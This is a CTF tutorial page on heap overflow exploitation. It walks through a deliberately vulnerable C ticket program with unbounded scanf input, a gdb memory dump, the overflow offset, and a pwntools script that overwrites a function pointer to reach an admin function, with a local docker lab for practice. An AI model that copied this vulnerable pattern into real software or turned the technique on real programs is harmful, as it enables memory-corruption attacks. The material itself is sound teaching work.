🏳️
The CTF Recipes
  • Introduction
  • Cryptography
    • Introduction
    • General knowledge
      • Encoding
        • Character encoding
          • ASCII
          • Unicode
          • UTF-8
        • Data encoding
          • Base16
          • Base32
          • Base64
      • Maths
        • Modular arithmetic
          • Greatest Common Divisor
          • Fermat's little theorem
          • Quadratic residues
          • Tonelli-Shanks
          • Chinese Remainder Theorem
          • Modular binomial
      • Padding
        • PKCS#7
    • Misc
      • XOR
    • Mono-alphabetic substitution
      • Index of coincidence
      • frequency analysis
      • Well known algorithms
        • 🔴Scytale
        • 🔴ROT
        • 🔴Polybe
        • 🔴Vigenere
        • 🔴Pigpen cipher
        • 🔴Affine cipher
    • Symmetric Cryptography
      • AES
        • Block Encryption procedure
          • Byte Substitution
          • Shift Row
          • Mix Column
          • Add Key
          • Key Expansion / Key Schedule
        • Mode of Operation
          • ECB
            • Block shuffling
              • Challenge example
            • ECB Oracle
              • Challenge example
          • CBC
            • Bit flipping
              • Challenge example
            • Padding oracle
              • Challenge example
          • OFB
            • Key stream reconstruction
            • Encrypt to Uncrypt
  • 🛠️Pwn
    • General knowledge
      • STACK
        • Variables storage
        • Stack frame
      • PLT and GOT
      • HEAP
        • HEAP operations
        • Chunk
        • Bins
        • Chunk allocation and reallocation
      • Syscall
    • Architectures
      • aarch32
        • Registers
        • Instruction set
        • Calling convention
      • aarch64
        • Registers
        • Instruction set
        • Calling convention
      • mips32
        • Registers
        • Instruction set
        • Calling convention
      • mips64
        • Registers
        • Instruction set
        • Calling convention
      • x86 / x64
        • Registers
        • Instruction set
        • Calling convention
    • Stack exploitation
      • Stack Buffer Overflow
        • Dangerous functions
          • gets
          • memcpy
          • sprintf
          • strcat
          • strcpy
        • Basics
          • Challenge example
        • Instruction pointer Overwrite
          • Challenge example
        • De Bruijn Sequences
        • Stack reading
          • Challenge example
      • Format string
        • Dangerous functions
          • printf
          • fprintf
        • Placeholder
        • Data Leak
          • Challenge example
        • Data modification
          • Challenge example
      • Arbitrary code execution
        • Shellcode
        • ret2reg
        • Code reuse attack
          • Ret2plt
          • Ret2dlresolve
          • GOT Overwrite
          • Ret2LibC
          • Leaking LibC
          • Ret2csu
          • Return Oriented Programming - ROP
          • Sigreturn Oriented Programming - SROP
          • Blind Return Oriented Programming - BROP
            • Challenge example
          • 🔴Call Oriented Programming - COP
          • 🔴Jump Oriented Programming - JOP
          • One gadget
        • Stack pivoting
    • 🛠️Heap exploitation
      • Heap overflow
        • Challenge example
      • Use after free
        • Challenge example
      • 🛠️Double free
      • 🔴Unlink exploit
    • Protections
      • Stack Canaries
      • No eXecute
      • PIE
      • ASLR
      • RELRO
    • Integer overflow
Powered by GitBook
On this page
  • Source code
  • Structures
  • login()
  • main
  • Exploitation
  • Exploit script
  • Exercice
  1. Pwn
  2. Heap exploitation
  3. Heap overflow

Challenge example

PreviousHeap overflowNextUse after free

Last updated 2 years ago

The exploitation of a depend on the program implementation. With this example, the attacker can exploit this in order to jump to an arbitrary function : "admin"

Source code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct user{
    char username[32];
    char password[32];
};

typedef struct ticket {
    void (*display)(struct ticket*);
    char username[32];
    char content[24];
} Ticket;

void display(Ticket *t){
    printf("%s\n", t->content);
}

char login(struct user *u){
    char secret[16] = "";
    char c;

    FILE *fp = fopen(".passwd", "r");
    fread(secret, 1, 15, fp);
    fclose(fp);
    secret[15] = '\0';

    if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) {
        return 1;
    } else {
        return 0;
    }
}

void admin(){
    printf("Welcome admin\n");
    // Make admin stuff
}

int main(int argc, char **argv){
    int log;
    char c=1, i;
    char buf[8];
    
    struct user *u = malloc(sizeof(struct user));
    strcpy(u->username, "Guest");
    strcpy(u->password, "");
    
    struct ticket *t = malloc(sizeof(struct ticket));
    t->display = display;
    strcpy(t->content, "");
    strcpy(t->username, u->username);

    while(c){
        printf("Press enter char to continue...");
        fgets(buf, 8, stdin);
        getchar();
        printf("\e[1;1H\e[2J");
        printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username);
        printf("1 - Read ticket\n");
        printf("2 - Create ticket\n");
        printf("3 - Delete ticket\n");
        printf("4 - Submit tickets\n");
        printf("5 - login\n");
        printf("0 - Exit\n");
        printf("Choice > ");
        scanf("%1s", buf);
        i = buf[0];
        printf("\e[1;1H\e[2J");
        switch (i) {
            case '0':
                c = 0;
                break;
            case '1':
                printf("Resume : \n");
                t->display(t);
                break;
            case '2':
                printf("Ticket content : \n");
                scanf("%24s",t->content);
                fflush(stdout);
                break;
            case '5':
                printf("Please enter credentials : \n");
                printf("Username : ");
                scanf("%s", u->username);
                printf("Password : ");
                scanf("%s", u->password);
                if (login(u) == 1){
                    admin();
                }
                break;
            default:
                printf("Function not yet implemented !\n");
        }
    }
    return 0;
}

Structures

There is two used structure inside this program :

  • user

struct user{
    char username[32];
    char password[32];
};

This structure has a size = 64 bytes ( 32 for username and 32 for password )

  • ticket

typedef struct ticket {
    void (*display)(struct ticket*);
    char username[32];
    char content[24];
} Ticket;

This structure has a size = 64 bytes ( 8 for *display , 32 for username and 24 for content )

Note: *display is a pointer to a function.

The two struct have the exact same size. It's not required but it's easier to exploit because the two allocated chunk will be taken from the same bin.

login()

char login(struct user *u){
    char secret[16] = "";
    char c;

    FILE *fp = fopen(".passwd", "r");
    fread(secret, 1, 15, fp);
    fclose(fp);
    secret[15] = '\0';

    if (strcmp(u->password, secret) == 0 && strcmp(u->password, "admin") == 0) {
        return 1;
    } else {
        return 0;
    }
}

This function will simply compare the username and the password with those for the admin user, if it's equals than the user is admin else it's a guest.

main

There is two parts into this function :

Variables setup

int log;
char c=1, i;
char buf[8];

struct user *u = malloc(sizeof(struct user));
strcpy(u->username, "Guest");
strcpy(u->password, "");

struct ticket *t = malloc(sizeof(struct ticket));
t->display = display;
strcpy(t->content, "");
strcpy(t->username, u->username);

This part setup needed variables.

Note that struct user *u = malloc(sizeof(struct user)); and struct ticket *t = malloc(sizeof(struct ticket)); are made directly one after the other.

Because there have the exact same size and their are declared at the same time, their position in memory will be side by side.

Menu loop

while(c){
        printf("Press enter char to continue...");
        fgets(buf, 8, stdin);
        getchar();
        printf("\e[1;1H\e[2J");
        printf("Welcome %-10s.\nWhat to do you want to do ?\n", u->username);
        printf("1 - Read ticket\n");
        printf("2 - Create ticket\n");
        printf("3 - Delete ticket\n");
        printf("4 - Submit tickets\n");
        printf("5 - login\n");
        printf("0 - Exit\n");
        printf("Choice > ");
        scanf("%1s", buf);
        i = buf[0];
        printf("\e[1;1H\e[2J");
        switch (i) {
            case '0':
                c = 0;
                break;
            case '1':
                printf("Resume : \n");
                t->display(t);
                break;
            case '2':
                printf("Ticket content : \n");
                scanf("%24s",t->content);
                fflush(stdout);
                break;
            case '5':
                printf("Please enter credentials : \n");
                printf("Username : ");
                scanf("%s", u->username);
                printf("Password : ");
                scanf("%s", u->password);
                if (login(u) == 1){
                    admin();
                }
                break;
            default:
                printf("Function not yet implemented !\n");
        }
    }

The user have some possible actions :

  1. Read ticket

This action will call the display function pointed by the pointer stored inside the ticket.

  1. Create ticket

This action will set the content and username values of the ticket

  1. login

This action permit to the user to provide username and password to login.

Note: both username and password are get from user input without any length control.

Here is the overflow

Exploitation

As explain before, the two allocated chunk are side by side in memory and have the exact same size (64 bytes)

The objective is to overwrite the display pointer to make it point to the admin function.

Let's check the memory state : 

gdb-peda$ i locals
log = <optimized out>
c = 0x1
i = 0x35
buf = "5\000\000\000\000\000\000"
u = 0x4052a0
t = 0x4052f0

u is stored at 0x4052a0 and t at 0x4052f0

By using login action, 10 A are put as username and 10 B as password to clearly identified their position in memory

The same is used for ticket content with 10 C

gdb-peda$ x/20x 0x4052a0
0x4052a0:       0x4141414141414141      0x0000000000004141
0x4052b0:       0x0000000000000000      0x0000000000000000
0x4052c0:       0x4242424242424242      0x4242424242004242
0x4052d0:       0x0000000000004242      0x0000000000000000
0x4052e0:       0x0000000000000000      0x0000000000000051
0x4052f0:       0x00000000004012b6      0x0000007473657547
0x405300:       0x0000000000000000      0x0000000000000000
0x405310:       0x0000000000000000      0x4343434343434343
0x405320:       0x0000000000004343      0x0000000000000000
0x405330:       0x0000000000000000      0x0000000000000411

Datas can clearly be identified :

username is at the beginning of the u chunk

Followed by password

Next there is the t metadatas

at 0x4052f0 there is the display pointer followed by the others ticket datas.

To overwrite the display pointer, it's needed to overwrite 0x4052f0 - 0x4052c0 = 48 bytes before writing the arbitrary address.

The amount of bytes to overwrite can also be calculated with data size :

password = 32 bytes

t metadatas = 16 bytes

16 + 32 = 48

The data send as password will then be : "A"*48 + p64(elf.symbols['admin'])

Exploit script 

from pwn import *

elf = context.binary = ELF("./chall")

p = process()

p.sendline()

target = p64(elf.symbols['admin'])

def choice(c):
    p.sendline()
    p.recv(timeout=1)
    p.sendline(c)

def login(username, password):
    choice(b'5')
    p.recv(timeout=1)
    p.sendline(username)
    p.recv(timeout=1)
    p.sendline(password)

login(b"A", b"B"*48 + target)
choice(b'1')

p.interactive()
p.close()

Exercice

docker pull thectfrecipes/pwn:heap_overflow

Deploy the image using the followed command : 

docker run --name heap_overflow -it --rm -d -p 3000:3000 thectfrecipes/pwn:heap_overflow

Access to the web shell with your browser at the address : http://localhost:3000/

login: challenge
password: password

If you want to try this exploit by yourself, you can pull :

🛠️
🛠️
Heap overflow
this docker image